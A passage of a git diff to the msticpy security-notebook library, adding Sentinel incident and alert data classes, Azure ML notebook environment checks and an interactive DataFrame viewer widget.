+        src_entity: Mapping[str, Any] = None,
+        src_event: Mapping[str, Any] = None,
+        src_event_type: str = "Sentinel",
+        **kwargs,
+    ):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+        src_event : Mapping[str, Any], optional
+            Create entity from event properties
+            (the default is None)
+        src_event_type: str
+            The type of src_event, by default "Sentinel".
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.DisplayName: Optional[str] = None
+        self.IncidentID: Optional[str] = None
+        self.Severity: Optional[str] = None
+        self.Status: Optional[str] = None
+        self.Owner: Optional[Dict] = None
+        self.Classification: Optional[str] = None
+        self.Labels: Optional[List] = None
+        self.Alerts: Optional[List] = None
+        self.Entities: Optional[List] = None
+
+        super().__init__(src_entity=src_entity, **kwargs)
+
+        if src_entity:
+            self._create_from_sent_event(src_entity)
+
+        if isinstance(src_event, pd.Series) and src_event_type == "Sentinel":
+            self._create_from_sent_event(src_event)
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return f"{self.TimeGenerated} - {self.DisplayName} - {self.IncidentID}"
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Description."""
+        return f"Incident: {self.DisplayName}"
+
+    def _create_from_sent_event(self, src_event):
+        self.TimeGenerated = src_event["properties.createdTimeUtc"]
+        self.DisplayName = src_event["properties.title"]
+        self.IncidentID = src_event["id"].split("/")[-1]
+        self.Severity = src_event["properties.severity"]
+        self.Status = src_event["properties.status"]
+        if "properties.classification" in src_event:
+            self.Classification = src_event["properties.classification"]
+        self.Labels = src_event["properties.labels"]
+        owner = {
+            "Name": src_event["properties.owner.assignedTo"],
+            "Email": src_event["properties.owner.email"],
+            "UPN": src_event["properties.owner.userPrincipalName"],
+            "ID": src_event["properties.owner.objectId"],
+        }
+        self.Owner = owner
+        additionaldata = {
+            "Alert Count": src_event["properties.additionalData.alertsCount"],
+            "Bookmarks Count": src_event["properties.additionalData.bookmarksCount"],
+            "Comments Count": src_event["properties.additionalData.commentsCount"],
+            "Products": src_event["properties.additionalData.alertProductNames"],
+            "Tactics": src_event["properties.additionalData.tactics"],
+            "Related Rule IDs": src_event["properties.relatedAnalyticRuleIds"],
+            "Incident Number": src_event["properties.incidentNumber"],
+        }
+        self.AdditionalData = additionaldata
+        self.StartTime = src_event["properties.firstActivityTimeUtc"]
+        self.EndTime = src_event["properties.lastActivityTimeUtc"]
+        if "Alerts" in src_event:
+            self._add_alerts(src_event)
+
+        if "Entities" in src_event:
+            self.Entities = _create_entities(src_event["Entities"])
+
+    def _add_alerts(self, src_event):
+        """Add alerts to incident."""
+        if src_event["Alerts"] and isinstance(src_event["Alerts"], list):
+            new_alerts = [Alert(src_entity=alrt) for alrt in src_event["Alerts"]]
+            self.Alerts = new_alerts
+
+    _entity_schema = {
+        # Time the Incident was Generated
+        "TimeGenerated": None,
+        # Incident Name
+        "DisplayName": None,
+        # Some unique identifier
+        "IncidentID": None,
+        # Incident severity
+        "Severity": None,
+        # Current status of the incident i.e. Open, Closed, etc
+        "Status": None,
+        # Object containing details of incident owner, could be email, display name, etc
+        "Owner": None,
+        # Post triage setting i.e. FP, TP, etc
+        "Classification": None,
+        # List of labels applied to an icident
+        "Labels": None,
+        # Assocaited alert GUIDs
+        "Alerts": None,
+        # List of associated entities
+        "Entities": None,
+        # Dynamic bag of other items
+        "AdditionalData ": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
+
+
+def _create_entities(entities):
+    """Create incident entities from API returned dicts."""
+    new_ents = []
+    for ent in entities:
+        if isinstance(ent, tuple):
+            ent_details = ent[1]
+            ent_type = ent[0]
+        elif isinstance(ent, dict):
+            ent_details = ent
+            ent_type = ent["Type"]
+        else:
+            ent_details = ent
+            ent_type = "unknown"
+        new_ent = camelcase_property_names(ent_details)
+        ent_obj = Entity.ENTITY_NAME_MAP[ent_type.lower()](src_event=new_ent)
+        new_ents.append(ent_obj)
+    return new_ents
diff --git a/msticpy/datamodel/soc/sentinel_alert.py b/msticpy/datamodel/soc/sentinel_alert.py
new file mode 100644
index 000000000..665df7e68
--- /dev/null
+++ b/msticpy/datamodel/soc/sentinel_alert.py
@@ -0,0 +1,159 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Sentinel Alert class."""
+import json
+
+from typing import Any, Dict, List
+import pandas as pd
+
+from ...datamodel.entities import Alert
+
+_FEATURES = [
+    "AdditionalData",
+    "AlertLink",
+    "AlertName",
+    "AlertSeverity",
+    "ProcessingEndTime",
+    "ResourceId",
+    "SourceComputerId",
+    "SourceSystem",
+    "Status",
+    "Tactics",
+    "TenantId",
+    "VendorOriginalId",
+]
+
+_ID_PROPERTIES: List[str] = [
+    "AzSubscriptionId",
+    "AzResourceId",
+    "WorkspaceId",
+    "AgentId",
+    "TenantId",
+    "SourceComputerId",
+    "ResourceId",
+    "WorkspaceSubscriptionId",
+    "WorkspaceResourceGroup",
+    "ProviderAlertId",
+    "SystemAlertId",
+    "ResourceIdentifiers",
+]
+
+_QUERY_PROPERTIES: List[str] = [
+    "Query Period",
+    "Trigger Operator",
+    "Trigger Threshold",
+    "Search Query Results Overall Count",
+    "Data Sources",
+    "Query",
+    "Query Start Time UTC",
+    "Query End Time UTC",
+    "Analytic Rule Ids",
+    "Event Grouping",
+    "Analytic Rule Name",
+]
+
+
+class SentinelAlert(Alert):
+    """Security Alert Class."""
+
+    def __init__(
+        self,
+        src_event=None,
+        src_entity=None,
+        **kwargs,
+    ):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+        src_event : Mapping[str, Any], optional
+            Create entity from event properties such as a Pandas Series
+            (the default is None)
+
+        """
+        self._custom_query_params: Dict[str, Any] = {}
+        super().__init__(src_entity, src_event, **kwargs)
+        if (
+            isinstance(
+                src_event,
+                pd.Series,
+            )
+            and not src_event.empty
+        ):
+            self._add_sentinel_items(src_event)
+            self._add_extended_sent_props()
+        self._ids: Dict[str, str] = {}
+        if self.__dict__ is not None:
+            for id_property in _ID_PROPERTIES:
+                if id_property in self.properties:
+                    self._ids[id_property] = self.properties[id_property]
+
+    def _add_extended_sent_props(self):
+        if self.ExtendedProperties:
+            try:
+                ext_ents = json.loads(self.ExtendedProperties)
+                for item_name, value in ext_ents.items():
+                    self.__dict__[item_name] = value
+            except json.JSONDecodeError:
+                pass
+        if self.AdditionalData:
+            for item_name, value in self.AdditionalData.items():
+                if item_name not in self.__dict__:
+                    self.__dict__[item_name] = value
+
+    def _add_sentinel_items(self, src_event):
+        for feature in _FEATURES:
+            if feature not in self.__dict__:
+                self.__dict__.update({feature: src_event.get(feature, "")})
+
+    @property
+    def ids(self) -> Dict[str, str]:
+        """Return a collection of Identity properties for the alert."""
+        return self._ids
+
+    @property
+    def is_in_workspace(self) -> bool:
+        """Return True if the alert has a Log Analytics WorkspaceID."""
+        return "WorkspaceId" in self._ids and "AgentId" in self._ids
+
+    @property
+    def is_in_log_analytics(self) -> bool:
+        """Return True if the alert originates from a Log Analytics Workspace host."""
+        return "TenantId" in self._ids
+
+    @property
+    def links(self):
+        """Return all links associated with the alert."""
+        alert_links = {}
+        if "ExtendedLinks" in self.__dict__:
+            try:
+                links = json.loads(self.__dict__["ExtendedLinks"])
+                for link in links:
+                    alert_links[link["Label"]] = link["Href"]
+            except json.JSONDecodeError:
+                pass
+        return alert_links
+
+    @property
+    def incident(self):
+        """Return any incident details associated with the alert."""
+        if "InvestigationName" not in self.__dict__:
+            self.__dict__["InvestigationName"] = None
+        return self.InvestigationName
+
+    @property
+    def analytic(self):
+        """Return any Sentinel Analytics associated with the alert."""
+        return {
+            query_property: self.__dict__[query_property]
+            for query_property in _QUERY_PROPERTIES
+            if query_property in self.__dict__
+        }
diff --git a/msticpy/datamodel/txt_df_magic.py b/msticpy/datamodel/txt_df_magic.py
new file mode 100644
index 000000000..0374d6a29
--- /dev/null
+++ b/msticpy/datamodel/txt_df_magic.py
@@ -0,0 +1,20 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Text to DataFrame IPython magic."""
+from IPython.core.magic import needs_local_scope, register_cell_magic
+from .pivot_magic_core import run_txt2df
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+@register_cell_magic
+@needs_local_scope
+def txt2df(line, cell, local_ns):
+    """Convert cell text to pandas DataFrame."""
+    return run_txt2df(line, cell, local_ns)
diff --git a/msticpy/msticpyconfig.yaml b/msticpy/msticpyconfig.yaml
new file mode 100644
index 000000000..3dd3890b0
--- /dev/null
+++ b/msticpy/msticpyconfig.yaml
@@ -0,0 +1,5 @@
+msticpy:
+  FriendlyExceptions: True
+QueryDefinitions:
+  Default:
+    - 'queries'
diff --git a/msticpy/nbtools/__init__.py b/msticpy/nbtools/__init__.py
index c6f695173..ec37204f5 100644
--- a/msticpy/nbtools/__init__.py
+++ b/msticpy/nbtools/__init__.py
@@ -7,16 +7,20 @@
 # flake8: noqa: F403
 
 # pylint: disable=W0401
-from . import query_builtin_queries
-from . nbwidgets import *
-from . entityschema import *
-from . import kql as qry
-from . security_alert import *
-from . security_event import *
-from . security_alert_graph import *
-from . import utility as util
-from . query_mgr import *
-from . import query_builtin_queries as qrydef
-from . import nbdisplay as disp
+from . import nbwidgets
+
+from ..datamodel import entities
+from .security_alert import SecurityAlert
+from .security_event import SecurityEvent
+from .security_alert_graph import *
+from ..common import utility as utils
+
+from .observationlist import Observations
+from ..common.wsconfig import WorkspaceConfig
+from . import nbdisplay
 
 # pylint: enable=W0401
+
+from .._version import VERSION
+
+__version__ = VERSION
diff --git a/msticpy/nbtools/azure_ml_tools.py b/msticpy/nbtools/azure_ml_tools.py
new file mode 100644
index 000000000..5fb4223d9
--- /dev/null
+++ b/msticpy/nbtools/azure_ml_tools.py
@@ -0,0 +1,396 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Checker functions for Azure ML notebooks."""
+import os
+import sys
+from pathlib import Path
+from typing import Any, List, Mapping, Optional, Tuple, Union
+
+from IPython import get_ipython
+from IPython.display import HTML, display
+from pkg_resources import parse_version, WorkingSet, Requirement, DistInfoDistribution
+
+from .._version import VERSION
+from ..common.pkg_config import refresh_config
+
+
+__version__ = VERSION
+
+AZ_GET_STARTED = (
+    "https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/A%20Getting"
+    "%20Started%20Guide%20For%20Azure%20Sentinel%20ML%20Notebooks.ipynb"
+)
+TROUBLE_SHOOTING = (
+    "https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/"
+    "TroubleShootingNotebooks.ipynb"
+)
+MISSING_PKG_ERR = """
+    <h4><font color='orange'>The package '<b>{package}</b>' is not
+    installed or has an unsupported version (installed version = '{inst_ver}')</font></h4>
+    Please install or upgrade before continuing: required version is {package}>={req_ver}
+    """
+MP_INSTALL_FAILED = """
+    <h4><font color='red'>The notebook may not run correctly without
+    the correct version of '<b>{pkg}</b>' ({ver} or later).</font></h4>
+    Please see the <a href="{nbk_uri}">
+    Getting Started Guide For Azure Sentinel ML Notebooks</a></b>
+    for more information<br><hr>
+"""
+RELOAD_MP = """
+    <h4><font color='orange'>Kernel restart needed</h4>
+    An error was detected trying to load the updated version of MSTICPy.<br>
+    Please restart the notebook kernel and re-run this cell - it should
+    run without error.
+    """
+
+MIN_PYTHON_VER_DEF = "3.6"
+MSTICPY_REQ_VERSION = __version__
+
+VER_RGX = r"(?P<maj>\d+)\.(?P<min>\d+).(?P<pnt>\d+)(?P<suff>.*)"
+MP_ENV_VAR = "MSTICPYCONFIG"
+MP_FILE = "msticpyconfig.yaml"
+NB_CHECK_URI = (
+    "https://raw.githubusercontent.com/Azure/Azure-Sentinel-"
+    "Notebooks/master/utils/nb_check.py"
+)
+
+
+def is_in_aml():
+    """Return True if running in Azure Machine Learning."""
+    return os.environ.get("APPSETTING_WEBSITE_SITE_NAME") == "AMLComputeInstance"
+
+
+def check_versions(
+    min_py_ver: Union[str, Tuple] = MIN_PYTHON_VER_DEF,
+    min_mp_ver: Union[str, Tuple] = MSTICPY_REQ_VERSION,
+    extras: Optional[List[str]] = None,
+    mp_release: Optional[str] = None,
+    **kwargs,
+):
+    """
+    Check the current versions of the Python kernel and MSTICPy.
+
+    Parameters
+    ----------
+    min_py_ver : Union[Tuple[int, int], str]
+        Minimum Python version
+    min_mp_ver : Union[Tuple[int, int], str]
+        Minimum MSTICPy version
+    extras : Optional[List[str]], optional
+        A list of extras required for MSTICPy
+    mp_release : Optional[str], optional
+        Override the MSTICPy release version. This
+        can also be specified in the environment variable 'MP_TEST_VER'
+
+    Raises
+    ------
+    RuntimeError
+        If the Python version does not support the notebook.
+        If the MSTICPy version does not support the notebook
+        and the user chose not to upgrade
+
+    """
+    del kwargs
+    _disp_html("<h4>Starting notebook pre-checks...</h4>")
+    if isinstance(min_py_ver, str):
+        min_py_ver = _get_pkg_version(min_py_ver).release
+    check_python_ver(min_py_ver=min_py_ver)
+
+    _check_mp_install(min_mp_ver, mp_release, extras)
+    _check_kql_prereqs()
+    _set_kql_env_vars(extras)
+    _run_user_settings()
+    _set_mpconfig_var()
+    _disp_html("<h4>Notebook pre-checks complete.</h4>")
+
+
+def check_python_ver(min_py_ver: Union[str, Tuple] = MIN_PYTHON_VER_DEF):
+    """
+    Check the current version of the Python kernel.
+
+    Parameters
+    ----------
+    min_py_ver : Tuple[int, int]
+        Minimum Python version
+
+    Raises
+    ------
+    RuntimeError
+        If the Python version does not support the notebook.
+
+    """
+    min_py_ver = _get_pkg_version(min_py_ver)
+    sys_ver = _get_pkg_version(sys.version_info[:3])
+    _disp_html("Checking Python kernel version...")
+    if sys_ver < min_py_ver:
+        # Bandit SQL inject error found here
+        _disp_html(
+            f"""
+            <h4><font color='red'>This notebook requires a later
+            (Python) kernel version.</h4></font>
+            Select a kernel from the notebook toolbar (above), that is Python
+            {min_py_ver} or later (Python 3.8 recommended)<br>
+            """  # nosec
+        )
+        _disp_html(
+            f"""
+            Please see the <a href="{TROUBLE_SHOOTING}">TroubleShootingNotebooks</a>
+            for more information<br><br><hr>
+            """
+        )
+        # Bandit SQL inject error found here
+        raise RuntimeError(f"Python {min_py_ver} or later kernel is required.")  # nosec
+
+    if sys_ver < _get_pkg_version("3.8"):
+        _disp_html(
+            "Recommended: switch to using the 'Python 3.8 - AzureML' notebook kernel"
+            " if this is available."
+        )
+    _disp_html(f"Info: Python kernel version {sys_ver} - OK<br>")
+
+
+def _check_mp_install(
+    min_mp_ver: Union[str, Tuple],
+    mp_release: Optional[str],
+    extras: Optional[List[str]],
+):
+    """Check for and try to install required MSTICPy version."""
+    # Use the release ver specified in params, in the environment or
+    # the notebook default.
+    pkg_version = _get_pkg_version(min_mp_ver)
+    mp_install_version = mp_release or os.environ.get("MP_TEST_VER") or str(pkg_version)
+
+    check_mp_ver(min_msticpy_ver=mp_install_version, extras=extras)
+
+
+def check_mp_ver(min_msticpy_ver: Union[str, Tuple], extras: Optional[List[str]]):
+    """
+    Check and optionally update the current version of msticpy.
+
+    Parameters
+    ----------
+    min_msticpy_ver : Tuple[int, int]
+        Minimum MSTICPy version
+    extras : Optional[List[str]], optional
+        A list of extras required for MSTICPy
+
+    Raises
+    ------
+    ImportError
+        If MSTICPy version is insufficient and we need to upgrade
+
+    """
+    mp_min_pkg_ver = _get_pkg_version(min_msticpy_ver)
+
+    _disp_html("Checking msticpy version...<br>")
+
+    # Check currently loaded MP version against notebook requirement
+    loaded_version = _get_pkg_version(__version__)
+    if loaded_version < mp_min_pkg_ver:
+        _disp_html(
+            MISSING_PKG_ERR.format(
+                package="msticpy",
+                inst_ver=loaded_version,
+                req_ver=mp_min_pkg_ver,
+            )
+        )
+        mp_pkg_spec = f"msticpy[{','.join(extras)}]" if extras else "msticpy"
+        mp_pkg_spec = f"{mp_pkg_spec}>={min_msticpy_ver}"
+
+        _disp_html(
+            f"Please run the following command to upgrade MSTICPy<br>"
+            f"<pre>%pip install --upgrade {mp_pkg_spec}</pre><br>"
+        )
+        raise ImportError(
+            "Unsupported version of MSTICPy installed",
+            f"Installed version: {loaded_version}",
+            f"Required version: {mp_min_pkg_ver}",
+        )
+
+    # Check loaded version against installed version in the environment
+    # If the version was updated after this version was loaded by Python
+    # we need to warn the user to restart the kernel.
+    installed_version = _get_installed_mp_version()
+    if installed_version and installed_version > loaded_version:
+        _disp_html(
+            f"A newer version of MSTICPy ({installed_version})"
+            "has been installed but has not been loaded.<br>"
+            "Please restart the notebook kernel and re-run this cell."
+        )
+    _disp_html(f"Info: msticpy version {loaded_version} (>= {mp_min_pkg_ver}) - OK<br>")
+
+
+def _set_kql_env_vars(extras: Optional[List[str]]):
+    """Set environment variables for Kqlmagic based on MP extras."""
+    jp_extended = ("azsentinel", "azuresentinel", "kql")
+    if extras and any(extra for extra in extras if extra in jp_extended):
+        os.environ["KQLMAGIC_EXTRAS_REQUIRE"] = "jupyter-extended"
+    else:
+        os.environ["KQLMAGIC_EXTRAS_REQUIRE"] = "jupyter-basic"
+    if is_in_aml():
+        os.environ["KQLMAGIC_AZUREML_COMPUTE"] = _get_vm_fqdn()
+
+
+def _get_pkg_version(version: Union[str, Tuple]) -> DistInfoDistribution:
+    """Return pkg_resources parsed version from string or tuple."""
+    if isinstance(version, str):
+        return parse_version(version)
+    if isinstance(version, tuple):
+        return parse_version(".".join(str(ver) for ver in version))
+    raise TypeError(f"Version {version} no parseable.")
+
+
+def _get_installed_mp_version() -> Optional[DistInfoDistribution]:
+    """Return the installed version of MSTICPY."""
+    working_set = WorkingSet()
+    mp_installed = working_set.find(Requirement("msticpy"))
+    if mp_installed:
+        return mp_installed.parsed_version
+    return None
+
+
+def _disp_html(text: str):
+    """Display the HTML text."""
+    display(HTML(text))
+
+
+def get_aml_user_folder() -> Optional[Path]:
+    """Return the root of the user folder."""
+    path_parts = Path(".").absolute().parts
+    if "Users" not in path_parts:
+        return None
+    # find the index of the last occurrence of "users"
+    users_idx = len(path_parts) - path_parts[::-1].index("Users")
+    # the user folder is one item below this
+    if len(path_parts) < users_idx + 1:
+        return None
+    return Path("/".join(path_parts[: users_idx + 1]))
+
+
+# pylint: disable=import-outside-toplevel, unused-import, import-error
+def _run_user_settings():
+    """Import nbuser_settings.py, if it exists."""
+    user_folder = get_aml_user_folder()
+    if user_folder.joinpath("nbuser_settings.py").is_file():
+        sys.path.append(str(user_folder))
+        import nbuser_settings  # noqa: F401
+
+
+# pylint: enable=import-outside-toplevel, unused-import, import-error
+
+
+def _set_mpconfig_var():
+    """Set MSTICPYCONFIG to file in user directory if no other found."""
+    mp_path_val = os.environ.get(MP_ENV_VAR)
+    if (
+        # If a valid MSTICPYCONFIG value is found - return
+        (mp_path_val and Path(mp_path_val).is_file())
+        # Or if there is a msticpconfig in the current folder.
+        or Path(".").joinpath(MP_FILE).is_file()
+    ):
+        return
+    # Otherwise check the user's root folder
+    user_dir = get_aml_user_folder()
+    mp_path = Path(user_dir).joinpath(MP_FILE)
+    if mp_path.is_file():
+        # If there's a file there, set the env variable to that.
+        os.environ[MP_ENV_VAR] = str(mp_path)
+        # Since we have already imported msticpy to check the version
+        # it will have already configured settings so we need to refresh.
+        refresh_config()
+        _disp_html(
+            f"<br>No {MP_FILE} found. Will use {MP_FILE} in user folder {user_dir}<br>"
+        )
+
+
+_NBVM_PATH = "/mnt/azmnt/.nbvm"
+
+
+def _get_vm_metadata() -> Mapping[str, Any]:
+    """Read VM metadata from definition file."""
+    with open(_NBVM_PATH, "r", encoding="utf-8") as nbvm_handle:
+        nbvm_lines = nbvm_handle.readlines()
+    return {
+        item[0]: item[1]
+        for item in map(lambda x: x.split("=", maxsplit=1), nbvm_lines)
+        if item
+    }
+
+
+def _get_vm_fqdn() -> str:
+    """Get the FQDN of the host."""
+    vm_metadata = _get_vm_metadata()
+    if vm_metadata and "instance" in vm_metadata:
+        return (
+            f"https://{vm_metadata.get('instance')}.{vm_metadata.get('domainsuffix')}"
+        )
+    return ""
+
+
+def _check_kql_prereqs():
+    """
+    Check and install packages for Kqlmagic/msal_extensions.
+
+    Notes
+    -----
+    Kqlmagic may trigger warnings about a missing PyGObject package
+    and some system library dependencies. To fix this do the
+    following:<br>
+    From a notebook run:
+
+        %pip uninstall enum34
+        !sudo apt-get --yes install libgirepository1.0-dev
+        !sudo apt-get --yes install gir1.2-secret-1
+        %pip install pygobject
+
+    You can also do this from a terminal - but ensure that you've
+    activated the environment corresponding to the kernel you are
+    using prior to running the pip commands.
+
+        # Install the libgi dependency
+        sudo apt install libgirepository1.0-dev
+        sudo apt install gir1.2-secret-1
+
+        # activate the environment
+        # conda activate azureml_py38
+        # source ./env_path/scripts/activate
+
+        # Uninstall enum34
+        python -m pip uninstall enum34
+        # Install pygobject
+        python -m install pygobject
+
+    """
+    if not is_in_aml():
+        return
+    try:
+        # If this successfully imports, we are ok
+        # pylint: disable=import-outside-toplevel
+        import gi
+
+        # pylint: enable=import-outside-toplevel
+        del gi
+    except ImportError:
+        # Check for system packages
+        ip_shell = get_ipython()
+        if not ip_shell:
+            return
+        apt_list = ip_shell.run_line_magic("sx", "apt list")
+        apt_list = [apt.split("/", maxsplit=1)[0] for apt in apt_list]
+        missing_lx_pkg = [
+            apt_pkg
+            for apt_pkg in ("libgirepository1.0-dev", "gir1.2-secret-1")
+            if apt_pkg not in apt_list
+        ]
+        if missing_lx_pkg:
+            _disp_html(
+                "Kqlmagic/msal-extensions pre-requisite PyGObject not installed."
+            )
+            _disp_html(
+                "To prevent warnings when loading the Kqlmagic data provider,"
+                " Please run the following command:<br>"
+                "!conda install --yes -c conda-forge pygobject<br>"
+            )
diff --git a/msticpy/nbtools/data_viewer.py b/msticpy/nbtools/data_viewer.py
new file mode 100644
index 000000000..9acc9a4ef
--- /dev/null
+++ b/msticpy/nbtools/data_viewer.py
@@ -0,0 +1,537 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Dataframe viewer."""
+from collections import namedtuple
+from typing import Dict, List, Union
+
+import ipywidgets as widgets
+import pandas as pd
+from bokeh.io import push_notebook, show, output_notebook
+from bokeh.models import (
+    BooleanFilter,
+    CDSView,
+    ColumnDataSource,
+    DataTable,
+    DateFormatter,
+    TableColumn,
+)
+from IPython.display import display
+
+from . import nbwidgets
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+FilterExpr = namedtuple("FilterExpr", "column, inv, operator, expr")
+
+
+# pylint: disable=too-many-instance-attributes
+class DataViewer:
+    """Data viewer class."""
+
+    _DEF_HEIGHT = 550
+
+    def __init__(
+        self, data: pd.DataFrame, selected_cols: List[str] = None, debug=False
+    ):
+        """
+        Initialize the DataViewer class.
+
+        Parameters
+        ----------
+        data : pd.DataFrame
+            The DataFrame to view
+        selected_cols : List[str], optional
+            Initial subset of columns to show, by default None (all cols)
+        debug : bool
+            Output additional debugging info to std out.
+
+        """
+        if data.empty:
+            raise ValueError("No data available in 'data'")
+
+        output_notebook(hide_banner=True)
+        # Drop empty columns
+        data = data.dropna(axis="columns", how="all")
+        self.cds = ColumnDataSource(data)
+        self._columns = _get_cols_from_df(data)
+        self._dt_columns = list(self._columns.values())
+        self.data = data
+        self._debug = debug
+
+        self.nb_handle = None
+        self.data_table = DataTable(
+            source=self.cds,
+            columns=self._dt_columns,
+            view=CDSView(source=self.cds),
+            height=self._calc_df_height(data),
+            width_policy="max",
+            auto_edit=True,
+            editable=True,
+            reorderable=True,
+        )
+
+        self.column_chooser = DataTableColumnChooser(data, selected_cols=selected_cols)
+        self.data_filter = DataTableFilter(data)
+        if selected_cols is not None:
+            self._update_columns(btn=None)
+
+        self.column_chooser.apply_button.on_click(self._update_columns)
+        self.data_filter.apply_button.on_click(self._apply_filter)
+
+        self.accordion = widgets.Accordion(
+            children=[self.column_chooser.layout, self.data_filter.layout]
+        )
+        self.accordion.set_title(0, "Choose columns")
+        self.accordion.set_title(1, "Filter data")
+        self.accordion.selected_index = None
+
+        self.layout = self.accordion
+
+    @property
+    def filtered_data(self) -> pd.DataFrame:
+        """Return filtered dataframe."""
+        return self.data_filter.filtered_dataframe[self.column_chooser.selected_columns]
+
+    @property
+    def filters(self) -> Dict[str, FilterExpr]:
+        """Return current filters as a dict."""
+        return self.data_filter.filters
+
+    def import_filters(self, filters: Dict[str, FilterExpr]):
+        """
+        Import filter set replacing current filters.
+
+        Parameters
+        ----------
+        filters : Dict[str, FilterExpr]
+            dict of filter name, FilterExpr
+            FilterExpr is a tuple of:
+            column [str], inv [bool], operator [str], expr [str]
+
+        """
+        self.data_filter.import_filters(filters)
+        self._apply_filter(btn=None)
+
+    def _calc_df_height(self, data):
+        df_height = 20 + (len(data) * 20)
+        return min(df_height, self._DEF_HEIGHT)
+
+    def show(self):
+        """Display the data table control."""
+        if self._debug:
+            print("_update_data_table")
+        self.nb_handle = show(self.data_table, notebook_handle=True)
+
+    def _update_data_table(self):
+        if self._debug:
+            print("_update_data_table")
+            print(self.data_filter.filters)
+            print(len(self.filtered_data))
+            print(self.filtered_data.iloc[:2])
+        if self.nb_handle:
+            push_notebook(handle=self.nb_handle)
+
+    def display(self):
+        """Display the widget."""
+        self.show()
+        display(self.layout)
+
+    def _ipython_display_(self):
+        """Display in IPython."""
+        self.display()
+
+    def _update_columns(self, btn):
+        del btn
+        self.data_table.columns = self.column_chooser.datatable_columns
+        self._update_data_table()
+
+    def _apply_filter(self, btn):
+        del btn
+        if self._debug:
+            print("_apply_filter")
+        self.data_table.view = CDSView(
+            source=self.cds, filters=[BooleanFilter(self.data_filter.bool_filters)]
+        )
+        self.data_table.height = self._calc_df_height(
+            self.data_filter.filtered_dataframe
+        )
+        self._update_data_table()
+
+
+class DataTableColumnChooser:
+    """DataTableColumnChooser class."""
+
+    def __init__(self, data, selected_cols=None):
+        """Initialize the DataTableColumnChooser class."""
+        self.data = data
+        self._all_col_names = list(data.columns)
+        self._initial_cols = selected_cols or self._all_col_names
+        self._col_select = nbwidgets.SelectSubset(
+            default_selected=self._initial_cols,
+            source_items=self._all_col_names,
+            auto_display=False,
+        )
+
+        self.apply_button = widgets.Button(description="Apply columns")
+        self.layout = widgets.VBox([self._col_select.layout, self.apply_button])
+
+    @property
+    def datatable_columns(self):
+        """Return a list of Bokeh column definitions for the DataFrame."""
+        return list(_get_cols_from_df(self.dataframe_columns).values())
+
+    @property
+    def dataframe_columns(self):
+        """Return the selected set of DataFrame columns."""
+        return self.data[self._reorder_cols(self.selected_columns)]
+
+    def _reorder_cols(self, columns):
+        """Return column list in original order."""
+        # order the columns as originally specified (or as the DF)
+        col_init = [col for col in self._initial_cols if col in columns]
+        # If any new columns, add them to the end of the list
+        col_init.extend(list(set(columns) - set(col_init)))
+        return col_init
+
+    def display(self):
+        """Display in IPython."""
+        display(self.layout)
+
+    def _ipython_display_(self):
+        """Display in IPython."""
+        self.display()
+
+    @property
+    def selected_columns(self):
+        """Return the selected columns."""
+        return self._reorder_cols(self._col_select.selected_items)
+
+
+def _layout(width, height=None, desc_width=None, **kwargs):
+    """Layout creation for widgets."""
+    wgt_dict = {}
+    lo_dict = {"width": width}
+    if height:
+        lo_dict["height"] = height
+    border = kwargs.pop("border", None)
+    if border:
+        lo_dict.update(
+            {
+                "border": "solid gray 1px",
+                "margin": "1pt",
+                "padding": "5pt",
+            }
+        )
+    wgt_dict["layout"] = widgets.Layout(**lo_dict)
+    style_dict = {}
+    if desc_width:
+        style_dict["description_width"] = desc_width
+    if kwargs:
+        style_dict.update(kwargs)
+    if style_dict:
+        wgt_dict["style"] = style_dict
+    return wgt_dict
+
+
+class DataTableFilter:
+    """Data filtering class."""
+
+    _OPERATORS = {
+        "string": ["==", "contains", "matches", "in", "between", "query"],
+        "other": ["==", ">", "<", ">=", "<=", "in", "between", "query"],
+    }
+
+    def __init__(self, data: pd.DataFrame):
+        """Initialize the DataTableFilter class."""
+        self.all_cols = list(data.columns)
+        self.data = data
+
+        # Widgets
+        self._add_button = widgets.Button(description="Add filter")
+        self._del_button = widgets.Button(description="Delete filter")
+        self._upd_button = widgets.Button(description="Update filter")
+        self._clear_button = widgets.Button(description="Clear all filters")
+        self.apply_button = widgets.Button(description="Apply filter")
+        self._col_select = widgets.Dropdown(options=self.all_cols, **(_layout("200px")))
+        self._oper_sel = widgets.Dropdown(
+            options=self._col_operators(self.current_col), **(_layout("100px"))
+        )
+        self._not_cb = widgets.Checkbox(
+            description="not", value=False, **(_layout("60px", desc_width="initial"))
+        )
+        self._filter_value = widgets.Textarea(
+            description="Filter value", **(_layout("400px"))
+        )
+        self._curr_filters = widgets.Select(description="Filters", **(_layout("500px")))
+        self._oper_label = widgets.Label(" in ")
+
+        self.filters: Dict[str, FilterExpr] = {}
+
+        self._curr_filters.observe(self._select_filter, names="value")
+        self._col_select.observe(self._update_operators, names="value")
+
+        self._add_button.on_click(self._add_filter)
+        self._upd_button.on_click(self._update_filter)
+        self._del_button.on_click(self._del_filter)
+        self._clear_button.on_click(self._clear_filters)
+        filt_help_lbl = widgets.Label(
